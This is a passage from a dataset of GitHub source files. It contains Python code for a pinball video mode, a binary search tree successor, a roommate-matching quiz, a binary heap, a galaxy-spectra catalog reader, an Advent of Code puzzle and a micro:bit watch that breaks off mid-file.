self.all_friends = image_frames[6:12]\n\n        self.scope_frames = self.game.animations['scopeandshot'].frames[0:4]\n        
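        # The 'scopeandshot' sprite sheet appears to pack one scope frame per
        # aim position (indices 0-3) followed by one shot frame per position
        # (indices 4-7); update_scope_pos and shoot below index both lists by
        # scope_pos.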
self.shot_frames = self.game.animations['scopeandshot'].frames[4:8]\n\n    def mode_started(self):\n        self.success = False\n        self.state = 'intro'\n        self.scope_pos = 0\n        self.num_enemies = 0\n        self.num_enemies_shot = 0\n        self.speed_factor = 1\n        self.targets = ['empty'] * 4\n        self.available_friends = self.all_friends[:]\n        self.available_enemies = self.all_enemies[:]\n        shuffle(self.available_friends)\n        shuffle(self.available_enemies)\n        self.intro()\n\n    def intro(self):\n        self.game.enable_flippers(False)\n        font_large = self.game.fonts['large']\n        font_medium = self.game.fonts['medium']\n\n        self.status_layer = TextLayer(128/2, 7, font_large, 'center', opaque=False).set_text('Video Mode')\n\n        self.intro_layer_0 = GroupedLayer(128, 32, [self.status_layer])\n\n        self.intro_layer_11 = TextLayer(128/2, 7, font_medium, 'center').set_text(self.enemy_text)\n        self.intro_layer_12 = TextLayer(128/2, 17, font_medium, 'center').set_text(self.friend_text)\n        self.intro_layer_1 = GroupedLayer(128, 32, [self.intro_layer_11, self.intro_layer_12])\n\n        self.intro_layer_21 = TextLayer(128/2, 7, font_medium, 'center').set_text('Flipper buttons aim')\n        self.intro_layer_22 = TextLayer(128/2, 17, font_medium, 'center').set_text('Fire buttons shoot')\n        self.intro_layer_2 = GroupedLayer(128, 32, [self.intro_layer_21, self.intro_layer_22])\n\n        self.layer = ScriptedLayer(128, 32, [\n            {'seconds':3.0, 'layer':self.intro_layer_0},\n            {'seconds':3.0, 'layer':self.intro_layer_1},\n            {'seconds':3.0, 'layer':self.intro_layer_2}])\n\n        self.layer.on_complete = self.start\n\n    def start(self):\n        self.state = 'active'\n        self.status_layer.set_text('')\n\n        self.target_layers = [self.new_frame_layer(True) for unused in range(0, 4)]\n        self.scope_layer = self.new_frame_layer()\n        self.bullet_layers = [self.new_frame_layer() for unused in range(0, 4)]\n        self.result_layer = TextLayer(128/2, 20, self.game.fonts['medium'], 'center', opaque=False)\n\n        all_layers = self.target_layers + [self.scope_layer] + self.bullet_layers + [self.status_layer, self.result_layer]\n        self.layer = GroupedLayer(128, 32, all_layers)\n\n        # Add the first target after 1 second.\n        self.delay(name='add_target', event_type=None, delay=1, handler=self.add_target)\n        self.update_scope_pos()\n\n    def new_frame_layer(self, transition=False):\n        frame_layer = FrameLayer()\n        frame_layer.composite_op = 'blacksrc'\n        if transition:\n            frame_layer.transition = ExpandTransition()\n        return frame_layer\n\n    def add_target(self):\n        if self.num_enemies == 15:\n            self.delay(name='finish', event_type=None, delay=2.0, handler=self.finish)\n        else:\n            # speed up after the first 3 enemies shown, afterwards speed up after every 4 enemies shown\n            if self.speed_factor < 5 and self.num_enemies == 4 * self.speed_factor - 1:\n                self.speed_factor += 1\n\n            # Find the first empty position starting with the random start_index.\n            start_index = randint(0, 3)\n            for i in range(0, 3):\n                position = (i + start_index) % 4\n                if self.targets[position] == 'empty':\n                    target_type = randint(0, 1)\n                    if target_type:\n                        self.show_enemy(position)\n                    else:\n                        self.show_friend(position)\n                    self.delay(name='remove_target', event_type=None, delay=3.0-(self.speed_factor * 0.4), handler=self.remove_target, param=position)\n                    break\n\n            # Add a new target after a short delay\n            self.delay(name='add_target', event_type=None, delay=2.0-(self.speed_factor*0.3), handler=self.add_target)\n\n    def show_friend(self, position):\n        self.show_target(position, 'friend', self.available_friends)\n\n    def show_enemy(self, position):\n        self.num_enemies += 1\n        self.show_target(position, 
'enemy', self.available_enemies)\n\n def show_target(self, position, target_type, available_targets):\n self.bullet_layers[position].frame = None # remove empty shot if applicable\n # We never show the same friend or enemy on the screen more than once\n self.targets[position] = target_type\n target_frame = available_targets.pop()\n new_frame = Frame(128, 32)\n Frame.copy_rect(dst=new_frame, dst_x=position*32, dst_y=0, src=target_frame, src_x=0, src_y=0, width=32, height=32, op='blacksrc')\n self.target_layers[position].original_frame = target_frame\n self.target_layers[position].frame = new_frame\n self.target_layers[position].transition.in_out = 'in'\n self.target_layers[position].transition.start()\n\n def remove_target(self, position):\n # Only remove if it hasn't been shot.\n # If it has been shot, it will be removed later.\n if self.targets[position] != 'shot' and self.state == 'active':\n self.make_available(position)\n self.target_layers[position].transition.in_out = 'out'\n self.target_layers[position].transition.start()\n\n def make_available(self, position):\n available_targets = self.available_friends if self.targets[position] == 'friend' else self.available_enemies\n available_targets.append(self.target_layers[position].original_frame)\n shuffle(available_targets)\n self.targets[position] = 'empty'\n\n def sw_flipperLwL_active(self, sw):\n self.flipper_active(-1)\n\n def sw_flipperLwR_active(self, sw):\n self.flipper_active(1)\n\n def flipper_active(self, pos_delta):\n if self.state == 'intro':\n # skip the intro\n self.start()\n elif self.state == 'active':\n new_pos = self.scope_pos + pos_delta\n if 0 <= new_pos <= 3:\n self.scope_pos = new_pos\n self.update_scope_pos()\n\n def update_scope_pos(self):\n self.scope_layer.frame = self.scope_frames[self.scope_pos]\n\n def sw_fireL_active(self, sw):\n self.fire_active()\n return SwitchStop\n\n def sw_fireR_active(self, sw):\n self.fire_active()\n return SwitchStop\n\n def fire_active(self):\n if self.state == 'intro':\n # skip the intro\n self.start()\n elif self.state == 'active':\n self.shoot()\n\n def shoot(self):\n self.bullet_layers[self.scope_pos].frame = self.shot_frames[self.scope_pos]\n if self.targets[self.scope_pos] == 'enemy':\n self.shoot_enemy(self.scope_pos)\n elif self.targets[self.scope_pos] == 'empty':\n self.delay(name='remove_empty_shot', event_type=None, delay=0.5, handler=self.remove_empty_shot, param=self.scope_pos)\n elif self.targets[self.scope_pos] == 'friend':\n self.shoot_friend()\n\n def shoot_enemy(self, position):\n self.num_enemies_shot += 1\n self.game.sound.play(self.bad_guy_shot)\n self.targets[position] = 'shot'\n self.result_layer.set_text('Good Shot', 1)\n self.delay(name='blink_enemy_shot', event_type=None, delay=1.5, handler=self.blink_enemy_shot, param=position)\n\n def blink_enemy_shot(self, position):\n self.target_layers[position].blink_frames = 2\n self.bullet_layers[position].blink_frames = 2\n self.delay(name='remove_enemy_shot', event_type=None, delay=1, handler=self.remove_enemy_shot, param=position)\n\n def remove_enemy_shot(self, position):\n self.make_available(position)\n self.target_layers[position].frame = None\n self.bullet_layers[position].frame = None\n self.target_layers[position].blink_frames = 0\n self.bullet_layers[position].blink_frames = 0\n\n def shoot_friend(self):\n self.game.sound.play('good guy shot')\n self.state = 'complete'\n self.status_layer.set_text('Failed')\n self.cancel_delayed(['add_target', 'remove_target', 'remove_empty_shot', 'blink_enemy_shot', 
'remove_enemy_shot', 'finish'])\n self.delay(name='wrap_up', event_type=None, delay=2.0, handler=self.wrap_up)\n self.success = False\n\n def remove_empty_shot(self, position):\n # Make sure it's still empty\n if self.targets[position] == 'empty':\n self.bullet_layers[position].frame = None\n\n def finish(self):\n # the player reached the end of the round\n self.state = 'complete'\n self.cancel_delayed(['remove_target', 'remove_empty_shot', 'blink_enemy_shot', 'remove_enemy_shot'])\n self.intro_layer_21.set_text('Enemies Shot')\n self.intro_layer_22.set_text(str(self.num_enemies_shot) + ' of ' + str(self.num_enemies))\n self.layer = self.intro_layer_2\n self.delay(name='completion_bonus', event_type=None, delay=2.0, handler=self.completion_bonus)\n\n def completion_bonus(self):\n self.success = self.num_enemies_shot == self.num_enemies\n if self.success:\n self.game.sound.play('perfect')\n\n points = 100000 if self.success else 5000 * self.num_enemies_shot\n self.game.score(points)\n self.intro_layer_21.set_text('Perfect' if self.success else 'Completion Bonus')\n self.intro_layer_22.set_text(self.game.format_points(points))\n self.delay(name='wrap_up', event_type=None, delay=3.0, handler=self.wrap_up)\n\n def wrap_up(self):\n self.game.enable_flippers(True)\n if self.on_complete != None:\n self.on_complete(self.success)\n","repo_name":"clempo2/JD2-pyprocgame","sub_path":"my_modes/videomode.py","file_name":"videomode.py","file_ext":"py","file_size_in_byte":10965,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"62"} +{"seq_id":"1734675103","text":"# Daily Coding Problem #133\n# Problem\n# This problem was asked by Amazon.\n#\n# Given a node in a binary search tree, return the next bigger element, also known as the inorder successor.\n#\n# For example, the inorder successor of 22 is 30.\n#\n# 10\n# / \\\n# 5 30\n# / \\\n# 22 35\n# You can assume each node has a parent pointer.\n#\n# Solution\n# We can use case-analysis to break the problem down to two steps.\n#\n# First, if there is a right child of node, then the leftmost descendant of node.right (or just node.right if it has\n# none) is simply the inorder successor. Otherwise, we can find the inorder successor by traversing through the\n# parent pointers, keeping track of the current node and parent. When we find a parent whose left child is equal to\n# node, then we know this is the inorder successor. 
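# As a concrete (hypothetical) check of both cases, the second tree drawn
# below can be wired up by hand with the Node class and inorder_successor
# function defined further down, keeping each child's parent pointer
# consistent:
#
#   root = Node(10)
#   root.left = Node(5, parent=root)
#   root.right = Node(30, parent=root)
#   root.right.left = Node(22, parent=root.right)
#   root.right.right = Node(35, parent=root.right)
#   root.right.left.right = Node(25, parent=root.right.left)
#
#   assert inorder_successor(root).val == 22   # leftmost node of root.right
#   assert inorder_successor(root.right.left.right).val == 30  # first parent whose left child is on the path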
Let's look at an example.\n#\n# 10\n# / \\\n# 5 30\n# / \\\n# 22 35\n# \\\n# 25\n# The inorder successor of 10 is 22 since it has a right child and 22 is the leftmost child of node.right.\n# The inorder successor of 25 is 30 since 30 is the first parent where parent.left is node.\nclass Node:\n def __init__(self, val, left=None, right=None, parent=None):\n self.val = val\n self.left = left\n self.right = right\n self.parent = parent\n\n\ndef inorder_successor(node):\n if node.right:\n return leftmost(node.right)\n\n parent = node.parent\n\n while parent and parent.left is not node:\n parent, node = parent.parent, parent\n\n return parent\n\n\ndef leftmost(node):\n while node.left:\n node = node.left\n return node\n","repo_name":"henrylin2008/Coding_Problems","sub_path":"DailyCoding/inorder_successor.py","file_name":"inorder_successor.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"43159276300","text":"import statistics\r\nimport numpy as np\r\nimport pandas as pd\r\nimport random\r\n\r\ndef initialize(data_base,user_name):\r\n #needed for loop cause of sth i changed ask me if you want\r\n for i in range(0,5):\r\n data_base[user_name].append(\"\")\r\n\r\n\r\n#Fuction to sign up\r\ndef signup(data_base,weights):\r\n user_name = input(\"Create username: \")\r\n if user_name in data_base.keys():\r\n while user_name in data_base.keys():\r\n a=input(\"This username is already registered, you want to log in? (yes/no) \")\r\n if a==\"yes\":\r\n login(data_base,weights)\r\n return user_name\r\n elif a==\"no\":\r\n signup(data_base,weights)\r\n return user_name\r\n else:\r\n data_base[user_name] = []\r\n weights[user_name] = []\r\n initialize(data_base,user_name)\r\n print(f\"{user_name} has been correctly created and logged in. Welcome to Room&Roomies!\\n\")\r\n return user_name\r\n\r\n#Fuction to log in \r\ndef login(data_base,weights):\r\n user_name = input(\"Username: \")\r\n if user_name not in data_base.keys():\r\n while user_name not in data_base.keys():\r\n a=input(\"This username is not registered, you want to sign up? (yes/no) \")\r\n if a==\"yes\":\r\n signup(data_base,weights)\r\n elif a==\"no\":\r\n login(data_base,weights)\r\n else:\r\n #data_base[user_name] = []\r\n #weights[user_name] = []\r\n print(f\"{user_name} has been correctly logged in. Welcome back to Room&Roomies!\\n\")\r\n return user_name\r\n\r\n#Fuction to assign the importance of each category\r\ndef categories(user_name,weights):\r\n questions=[\"Points awarded to your future roomate demographic characteristics: \",\"Points awarded to personality traits: \",\"Points awarded to schedules: \",\"Points awarded to house chores: \",\"Points awarded to forms of entertainment: \"]\r\n username_weights=[]\r\n while sum(username_weights) != 10:\r\n print(\"You are awarded with 10 points, which can be distributed between the following categories. \\nThe more points you award to a category, the most important we will consider it on your search. 
\\nFollowing these instructions, please distribute 10 points across the following categories using integers.\\n\")\r\n points_available=10\r\n points_awarded=0\r\n username_weights=[]\r\n\r\n for question in questions:\r\n if points_available!=0:\r\n points_awarded = input(f\"{question}\")\r\n if points_awarded == \"\":\r\n points_awarded=0\r\n points_awarded=int(points_awarded) \r\n points_remaining=points_available\r\n points_available-=points_awarded\r\n\r\n while points_available<0:\r\n print(\"You exceeded the number of points available\")\r\n print(f\"You have {points_remaining} points left\")\r\n points_awarded = int(input(f\"{question}\"))\r\n points_available=points_remaining-points_awarded\r\n \r\n username_weights.append(points_awarded)\r\n if points_available != 0:\r\n print(f\"You have {points_available} points left\")\r\n else:\r\n print(\"No points left!\")\r\n else:\r\n username_weights.append(0)\r\n print(f\"\\n{username_weights}\\n\")\r\n if sum(username_weights) != 10:\r\n print(\"You have to assign the 10 points, you can't leave any out!\\n\")\r\n\r\n weights[user_name] = username_weights\r\n weights\r\n return weights\r\n\r\n\r\n#Fuction to assign the importance of each question\r\ndef questions(weights,data_base,user_name):\r\n def enter(puntuation):\r\n if puntuation==\"\":\r\n puntuation=0\r\n return int(puntuation)\r\n\r\n print (\"Are you ready to find your perfect match? \\nLet us get to know you! \\n3, 2, 1, GOO!!\")\r\n print(\"Rate from 1 to 10 how much you relate to the each of the following sentences. 1 being you don't relate with it at all and 10 being I completely relate\")\r\n\r\n #Demograpics\r\n demographics = [\"I prefer to live with people of my same ethnicity\",\"I prefer to live with people with similar age as mine\", \"I prefer to live with people with my same gender\", \"I prefer to live people who is single\"]\r\n user_demographics = []\r\n if weights[user_name][0] != 0:\r\n for demography in demographics:\r\n puntuation = input(f\"{demography}: \")\r\n puntuation = enter(puntuation)\r\n while puntuation > 11 or puntuation < 1:\r\n puntuation = input(f\"Rate from 1 to 10. {demography}: \")\r\n puntuation = enter(puntuation)\r\n\r\n user_demographics.append(puntuation)\r\n data_base[user_name][0]=weights[user_name][0]*statistics.mean(user_demographics)/10\r\n\r\n else:\r\n data_base[user_name][0]=0\r\n \r\n print(\"\\n\")\r\n \r\n #Psychographics\r\n personality_traits = [\"I am social and extroverted\",\"I don't like to spend time alone\", \"I am a loud person\", \"I am very methodic and organized\", \"I care a lot about my grades\"]\r\n user_personality = []\r\n if weights[user_name][1] != 0:\r\n for personality in personality_traits:\r\n puntuation = input(f\"{personality}: \")\r\n puntuation = enter(puntuation)\r\n while puntuation > 11 or puntuation < 1:\r\n puntuation = input(f\"Rate from 1 to 10. 
{personality}: \")\r\n puntuation = enter(puntuation)\r\n user_personality.append(puntuation)\r\n data_base[user_name][1]=weights[user_name][1]*statistics.mean(user_personality)/10\r\n\r\n else:\r\n data_base[user_name][1]=0\r\n\r\n print(\"\\n\")\r\n\r\n #Schedules\r\n schedules = [\"I wake up between 6am and 8am\",\"I go to bed after 00:30am\", \"I shower in the mornings\", \"I have very strict and established eating schedules\"]\r\n user_schedules = []\r\n if weights[user_name][2] != 0:\r\n for schedule in schedules:\r\n puntuation = input(f\"{schedule}: \")\r\n puntuation = enter(puntuation)\r\n while puntuation > 11 or puntuation < 1:\r\n puntuation = input(f\"Rate from 1 to 10. {schedule}: \")\r\n puntuation = enter(puntuation)\r\n user_schedules.append(puntuation)\r\n\r\n data_base[user_name][2]=weights[user_name][2]*statistics.mean(user_schedules)/10\r\n\r\n else:\r\n data_base[user_name][2]=0\r\n\r\n print(\"\\n\")\r\n \r\n #House chores\r\n chores = [\"I leave the kitchen clean everytime I cook\",\"I clean my room once a week\", \"I like making sure the house is tidy\", \"I am willing to do chores in common areas once a week\"]\r\n user_chores = []\r\n if weights[user_name][3] != 0:\r\n for chore in chores:\r\n puntuation = input(f\"{chore}: \")\r\n puntuation = enter(puntuation)\r\n while puntuation > 11 or puntuation < 1:\r\n puntuation = input(f\"Rate from 1 to 10. {chore}: \")\r\n puntuation = enter(puntuation)\r\n user_chores.append(puntuation)\r\n \r\n data_base[user_name][3]= weights[user_name][3]*statistics.mean(user_chores)/10\r\n\r\n else:\r\n data_base[user_name][3]=0\r\n \r\n print(\"\\n\")\r\n\r\n #Entertainment\r\n entertainments = [\"I often go to clubs\",\"I enjoy arts in general, such as reading and painting\", \"I like to watch series and movies\",\"I like to spend my freetime out\", \"I am a sports person\", \"I often travel\"]\r\n user_entertainments = []\r\n if weights[user_name][4] != 0:\r\n for entertainment in entertainments:\r\n puntuation = input(f\"{entertainment}: \")\r\n puntuation = enter(puntuation)\r\n while puntuation > 11 or puntuation < 1:\r\n puntuation = input(f\"Rate from 1 to 10. 
{entertainment}: \")\r\n puntuation = enter(puntuation)\r\n user_entertainments.append(puntuation)\r\n\r\n data_base[user_name][4]= weights[user_name][4]*statistics.mean(user_entertainments)/10\r\n\r\n else:\r\n data_base[user_name][4]=0\r\n \r\n print(\"\\n\")\r\n\r\n print(data_base)\r\n return data_base\r\n\r\n\r\n\r\ndef matches(user_name,data_base):\r\n def numpy_euclidian_distance(point_1, point_2):\r\n array_1, array_2 = np.array(point_1), np.array(point_2)\r\n squared_distance = np.sum(np.square(array_1 - array_2))\r\n distance = np.sqrt(squared_distance)\r\n return distance \r\n\r\n df = pd.DataFrame(data_base)\r\n print(df)\r\n hasht={}\r\n\r\n for i in range(0,len(df.columns)):\r\n if df.columns.values[i] != user_name:\r\n distance = numpy_euclidian_distance(df.loc[:,user_name],df.iloc[:,i])\r\n value=100-distance*10\r\n hasht[df.columns.values[i]]=value\r\n dic=dict(sorted(hasht.items(),key=lambda x:x[1],reverse=True))\r\n for d in dic:\r\n print(f\"Affinity with {d}: {dic[d]:.0f}%\")\r\n return \r\n","repo_name":"antosistacp/Room-roomies","sub_path":"functions_one.py","file_name":"functions_one.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"26158543383","text":"class BinaryHeap:\n \"\"\"A heap implemented as an array-backed binary tree.\"\"\"\n def __init__(self, is_max = lambda x, y: x >= y):\n \"\"\"Initialize a heap.\n \n is_max(x, y) should return true if x == max(x, y). The default value will\n create a max-heap.\n \"\"\"\n self.is_max = is_max\n self.values = []\n\n def push(self, value):\n \"\"\"Adds an element to the heap.\"\"\"\n self.values.append(value)\n index = len(self.values) - 1\n # Bubble up the new value until the heap property is restored.\n while index > 0:\n parent = (index - 1) // 2\n # Stop if heap property satisfied.\n if self.is_max(self.values[parent], self.values[index]):\n break\n (self.values[index], self.values[parent]) = (self.values[parent], self.values[index])\n index = parent\n\n def pop(self):\n \"\"\"Remove and return the element at the top of the heap, or None if the\n heap is empty.\"\"\"\n # Swap the top of the heap with the last element. 
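# A brief, hypothetical usage sketch for BinaryHeap (not part of the class):
# the default comparator yields a max-heap, while passing
# is_max=lambda x, y: x <= y would surface the smallest element first instead.
#
#   heap = BinaryHeap()
#   for value in [3, 1, 4, 1, 5]:
#       heap.push(value)
#   assert heap.pop() == 5
#   assert heap.pop() == 4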
After removing the top\n # of the heap, end will be the new size of the heap.\n end = len(self.values) - 1\n if end < 0:\n return None\n elif end == 0:\n # Short-circuit on single-item heaps\n return self.values.pop()\n\n self.values[0], self.values[end] = self.values[end], self.values[0]\n result = self.values.pop()\n # Bubble down the new top of heap until the heap property is restored.\n index = 0\n # Note: The while condition will never be false\n while index < end:\n left, right = 2 * index + 1, 2 * index + 2\n # Find the index of the max child.\n right_max = right < end and self.is_max(self.values[right], self.values[left])\n max_index = right if right_max else left\n # Stop if heap property satisfied (including if now a leaf node).\n if max_index >= end or self.is_max(self.values[index], self.values[max_index]):\n break\n self.values[index], self.values[max_index] = self.values[max_index], self.values[index]\n index = max_index\n return result","repo_name":"tonygoold/python_practice","sub_path":"binary_heap.py","file_name":"binary_heap.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"2593371444","text":"'''\n\n\n\n'''\nimport h5py \nimport numpy as np \nfrom astropy.io import fits\nfrom astropy.table import Table\n# -- fomospec -- \nfrom . import util as UT \n\n\nclass LGal(object): \n ''' interface with LGal catalogs \n '''\n def __init__(self): \n self._dir_lgal = ''.join([UT.dat_dir(), 'Lgal/']) \n\n def GalInput(self, galid): \n ''' read in input star-formation and chemical enrichment histories\n '''\n f_input = ''.join([self._dir_lgal, 'gal_inputs/', \n 'gal_input_' + str(galid) + '_BGS_template_FSPS_uvmiles.csv']) \n gal_input = Table.read(f_input, delimiter=' ')\n return gal_input\n\n def Spectra(self, galid, type='source', lib='bc03'): \n ''' Read in spectra given galid\n '''\n # source spectra file with meta data \n f_source = fits.open(self._Fspec(galid, 'source', lib)) \n \n # get meta data of spectra \n hdr = f_source[0].header\n meta = {}\n for k in hdr.keys(): \n meta[k] = hdr[k]\n\n spec = {} \n if type == 'source': \n # source spectra \n specin = f_source[1].data\n spec['wave'] = specin['wave']\n spec['flux'] = specin['flux_nodust_nonoise'] * 1e20\n spec['flux_unc'] = None \n\n elif type == 'desibgs': \n # desi-like spectra (in desiIO format) \n import desispec.io as desiIO\n f_desi = self._Fspec(galid, type, lib)#''.join([self._dir_lgal, 'spectra/', 'desi_out_', f_spec])\n spec_desi = desiIO.read_spectra(f_desi)\n\n spec['wave'] = np.concatenate([spec_desi.wave[b] for b in ['b', 'r', 'z']])\n spec['flux'] = np.concatenate([spec_desi.flux[b][0] for b in ['b', 'r', 'z']]) # 10-17 ergs/s/cm2/AA\n spec['flux_unc'] = np.concatenate([spec_desi.ivar[b][0]**-0.5 for b in ['b', 'r', 'z']])\n \n return spec, meta\n \n def SpecFit(self, galid, type='source', lib='bc03', fit='firefly', **fitkwargs): \n ''' Read in output files from different spectral fitters\n '''\n if fit == 'firefly': \n if 'dust' not in fitkwargs.keys(): \n raise ValueError(\"specify `dust` kwarg\") \n elif 'prospector' in fit:\n if 'masked' not in fitkwargs.keys(): \n raise ValueError(\"specify whether masked\") \n else: \n raise NotImplementedError \n\n f_spec = self._Fspec(galid, type, lib)\n if fit == 'firefly': \n return self._readFirefly(f_spec, dust=fitkwargs['dust']) \n elif fit == 'prospector_mcmc': \n return self._readProspector(f_spec, masked=fitkwargs['masked'], infer='mcmc') \n else: \n 
raise NotImplementedError \n\n def _readProspector(self, f_spec, masked=True, infer='mcmc'): \n ''' read in prospector output file and return MCMC chain \n and posterior. \n '''\n f_spec = '.'.join(f_spec.split('/')[-1].split('.')[:-1])+'.h5'\n \n if infer == 'mcmc': \n f_mc = ''.join([self._dir_lgal, 'spectra/',\n 'prospector.emcee.masked.', f_spec]) \n ef = h5py.File(f_mc, 'r')\n chain = ef['sampling']['chain'].value\n lnp = ef['sampling']['lnprobability'].value\n ef.close()\n return chain,lnp \n\n def _readFirefly(self, f_spec, dust='hpf_only'): \n ''' read in FireFly output file \n '''\n\n f_spec = '.'.join(f_spec.split('/')[-1].split('.')[:-1])+'.hdf5'\n\n f_ffly = ''.join([self._dir_lgal, 'spectra/',\n 'firefly.m11.MILES.imf_cha.dust_', dust, '.', f_spec]) \n f = h5py.File(f_ffly, 'r')\n \n output = {} \n for g in f.keys(): \n if g != 'properties': \n output[g] = f[g].value\n \n props = {} \n for k in f['properties'].keys(): \n props[k] = f['properties'][k].value\n return output, props\n\n def _Fspec(self, galid, type, lib): \n ''' spectra file\n '''\n if lib == 'bc03': \n str_lib = 'BC03_Stelib'\n else: \n raise NotImplementedError\n f_spec = ''.join(['gal_spectrum_', str(galid), '_BGS_template_', str_lib, '.fits']) \n f_source = ''.join([self._dir_lgal, 'templates/', f_spec])\n\n if type == 'source': \n return f_source \n elif type == 'desibgs': \n return ''.join([self._dir_lgal, 'spectra/', 'desi_out_', f_spec])\n\n\n'''\nother catalogs here\n'''\n","repo_name":"changhoonhahn/FOMOspec","sub_path":"fomospec/catalog.py","file_name":"catalog.py","file_ext":"py","file_size_in_byte":4512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"3816006034","text":"class Cucumber():\n def __init__(self, char):\n self.direction = char\n self.can_move = False\n\n def set_direction(self, direction):\n self.direction = direction\n\n def get_direction(self):\n return self.direction\n\n def set_can_move(self, yes_or_no):\n self.can_move = yes_or_no\n\n def it_can_move(self):\n return self.can_move\n\ninput_file = open('input.txt', 'r')\nall_lines = input_file.readlines()\n\n# with open(\"test.txt\") as f:\n# field = [[Cucumber(x) for x in row.strip('\\n')] for row in f]\n\nfield = []\nfor line in all_lines:\n l = []\n res = line.strip('\\n')\n for char in res:\n l.append(Cucumber(char))\n field.append(l)\n\n# print(str(len(field)))\n# print(str(len(field[0])))\nmove_counter = 0\nfor step in range(1, 1000):\n\n # Check EAST\n for i in range(len(field)):\n for j in range(len(field[i])):\n if (j + 1) == len(field[i]):\n if field[i][j].get_direction() == '>' and field[i][0].get_direction() == '.':\n field[i][j].set_can_move(True)\n elif field[i][j].get_direction() == '>' and field[i][j + 1].get_direction() == '.':\n field[i][j].set_can_move(True)\n\n # Move EAST\n for i in range(len(field)):\n for j in range(len(field[i])):\n if field[i][j].it_can_move():\n if (j + 1) == len(field[i]):\n field[i][0].set_direction('>')\n field[i][j].set_direction('.')\n field[i][j].set_can_move(False)\n move_counter = move_counter + 1\n else:\n field[i][j + 1].set_direction('>')\n field[i][j].set_direction('.')\n field[i][j].set_can_move(False)\n move_counter = move_counter + 1\n\n # Check SOUTH\n for i in range(len(field)):\n for j in range(len(field[i])):\n if (i + 1) == len(field):\n if field[i][j].get_direction() == 'v' and field[0][j].get_direction() == '.':\n field[i][j].set_can_move(True)\n elif field[i][j].get_direction() == 'v' and field[i + 
1][j].get_direction() == '.':\n                    field[i][j].set_can_move(True)\n\n    # Move SOUTH\n    for i in range(len(field)):\n        for j in range(len(field[i])):\n            if field[i][j].get_direction() == 'v' and field[i][j].it_can_move():\n                if (i + 1) == len(field):\n                    field[0][j].set_direction('v')\n                    field[i][j].set_direction('.')\n                    field[i][j].set_can_move(False)\n                    move_counter = move_counter + 1\n                else:\n                    field[i + 1][j].set_direction('v')\n                    field[i][j].set_direction('.')\n                    field[i][j].set_can_move(False)\n                    move_counter = move_counter + 1\n\n\n    print('Step: ' + str(step))\n    print('Counter: ' + str(move_counter))\n    if move_counter == 0:\n        print(str(step))\n        break\n    else: # next round\n        move_counter = 0\n        for i in range(len(field)):\n            for j in range(len(field[i])):\n                if field[i][j].it_can_move():\n                    raise RuntimeError('ERROR: resetting can_move failed!')","repo_name":"Tamalera/AdventOfCode2021","sub_path":"Day25/seaCucumberField.py","file_name":"seaCucumberField.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"15083555147","text":"######################################################\n# A watch (as in a small clock for your wrist or pocket)\n# \n# Button A sets the mode: Clock or Setting time\n# Button B \n#   in clock mode: shows the time as a scrolling display \n#   in setting mode: increments the time\n# \n# The LED array displays the clock time in the format hh:mm. \n# The digits of the time are represented by columns of LEDs.\n# \n# The digits 1 - 5 are represented by more LEDs being lit from \n# the bottom up.\n# \n# For instance the digit 3 would look like:\n# \n# .\n# .\n# X\n# X\n# X\n# \n# \n# The digits 6 - 9 are represented by LEDs being turned off from\n# the bottom up. The digit 6 would look like:\n# \n# X\n# X\n# X\n# X\n# .\n# \n# The centre column is a colon flashing once a second to separate hours from minutes.\n# \n# The time 17:49 would look like:\n# \n# . X . . X\n# . X . X .\n# . X . X .\n# . . . X .\n# X . . 
X .\n# \n# \n######################################################\n\nfrom microbit import *\n\n# Tweak CLOCK_ADJUST to make your system clock more accurate.\n# My clock is too fast by 4 seconds every minute so I use 4/60.\n# If your clock is too slow by 3 seconds every minute use -3/60.\nCLOCK_ADJUST = 4/60 \n\nlast_button_a_state = False\nlast_button_b_state = False\nlast_display_time = 0\nbase_time = 0\nmode = 0\n\nmodes = {0:\"clock\", 1:\"set h\", 2:\"mx10\", 3:\"m\"}\n\n\ndef decode_time(milliseconds):\n \"\"\"Converts a time in milliseconds into a string with hours:minutes,\"\"\"\n mins = int(milliseconds / (1000 * 60) % 60)\n hrs = int(milliseconds / (1000 * 60 * 60) % 24)\n return \"{h:0>2}:{m:0>2}\".format(h=hrs, m=mins)\n\n\ndef show_time(time):\n time_string = decode_time(time)\n\n for i in range(5):\n if time_string[i].isdigit():\n d = int(time_string[i])\n plot_LED_column(i, d)\n\n show_colon(mode==0 and int((time / 1000) % 2))\n\n\ndef show_colon(visible):\n display.set_pixel(2, 1, visible*9)\n display.set_pixel(2, 3, visible*9)\n\n\ndef get_clock_time():\n global base_time\n sys_time = running_time() / (1 + CLOCK_ADJUST)\n time = (sys_time - base_time) % (24 * 60 * 60 * 1000)\n base_time = sys_time - time \n return time\n\n\ndef plot_LED_column(column, number):\n \"\"\"plots a column of LEDs to represent a number from 0 - 9\"\"\"\n if number > 9:\n number = 9\n\n if number <= 5:\n for i in range(4, -1, -1):\n if i < 5 - number:\n display.set_pixel(column, i, 0)\n else:\n display.set_pixel(column, i, 9)\n\n if number > 5:\n for i in range(4, -1, -1):\n if i < 5 - (number - 5):\n display.set_pixel(column, i, 9)\n else:\n display.set_pixel(column, i, 0)\n\n\nwhile True:\n # detect a change in button A's state, the Mode button\n button_a_state = button_a.is_pressed()\n if button_a_state != last_button_a_state:\n last_button_a_state = button_a_state\n\n #increment the mode\n if button_a_state == True:\n mode = (mode + 1) % 4\n display.scroll(modes[mode])\n show_time(get_clock_time())\n\n # detect a change in button B's state, the increment / select button\n button_b_state = button_b.is_pressed()\n if button_b_state != last_button_b_state:\n last_button_b_state = button_b_state\n\n if button_b_state == True:\n # button B's action depends on the current mode\n if mode == 0: #show time\n display.scroll(decode_time(get_clock_time()))\n elif mode == 1: #setting time: increment hour units\n base_time = base_time - (60 * 60 * 1000)\n elif mode == 2: #setting time: increment minute tens\n base_time = base_time - (10 * 60 * 1000)\n elif mode == 3: #setting time: increment minute units\n base_time = base_time - (60 * 